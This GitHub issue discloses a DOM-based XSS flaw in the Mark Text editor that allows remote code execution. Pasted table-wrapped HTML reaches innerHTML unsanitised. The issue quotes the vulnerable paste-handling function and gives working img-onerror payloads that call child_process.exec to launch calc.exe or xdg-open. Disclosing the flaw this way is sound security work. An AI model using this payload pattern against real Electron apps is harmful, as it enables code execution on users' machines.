Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security issue: DOM based XSS & RCE - from pasting vulnerable HTML #2990

Closed
1 task done
luiseok opened this issue Feb 7, 2022 · 0 comments · Fixed by #3002
Closed
1 task done

Security issue: DOM based XSS & RCE - from pasting vulnerable HTML #2990

luiseok opened this issue Feb 7, 2022 · 0 comments · Fixed by #3002

Comments

@luiseok
Copy link

luiseok commented Feb 7, 2022

Description

An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS.

<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>

The above code is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script.

ContentState.prototype.checkCopyType = function (html, text) {
let type = 'normal'
if (!html && text) {
type = 'copyAsMarkdown'
const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(text.trim())
if (match && match[1]) {
const tag = match[1]
if (tag === 'table' && match.length === 3 && match[2] === 'table') {
// Try to import a single table
const tmp = document.createElement('table')
tmp.innerHTML = text
if (tmp.childElementCount === 1) {
return 'htmlToMd'
}
}
// TODO: We could try to import HTML elements such as headings, text and lists to markdown for better UX.
type = PARAGRAPH_TYPES.find(type => type === tag) ? 'copyAsHtml' : type
}
}
return type
}

  • Can you reproduce the issue?

Steps to reproduce

  1. Copy the vulnerable HTML code
    • <table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
  2. Paste it into Mark Text app

Expected behavior:

HTML should be sanitized before pasted into DOM.

Actual behavior:

No HTML sanitize procedure. Only checks if it's wrapped with <table> or not.

Link to an example: [optional]

bandicam.2022-02-08.01-33-25-900-cut.mp4
bandicam.2022-02-08.01-33-25-900.mp4

Versions

  • MarkText version: v0.16.3
  • Operating system:
    Windows 11 Version 21H2 - OS Build 22000.469
    Kali Linux Kali GNU/Linux Rolling 2021.4
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

1 participant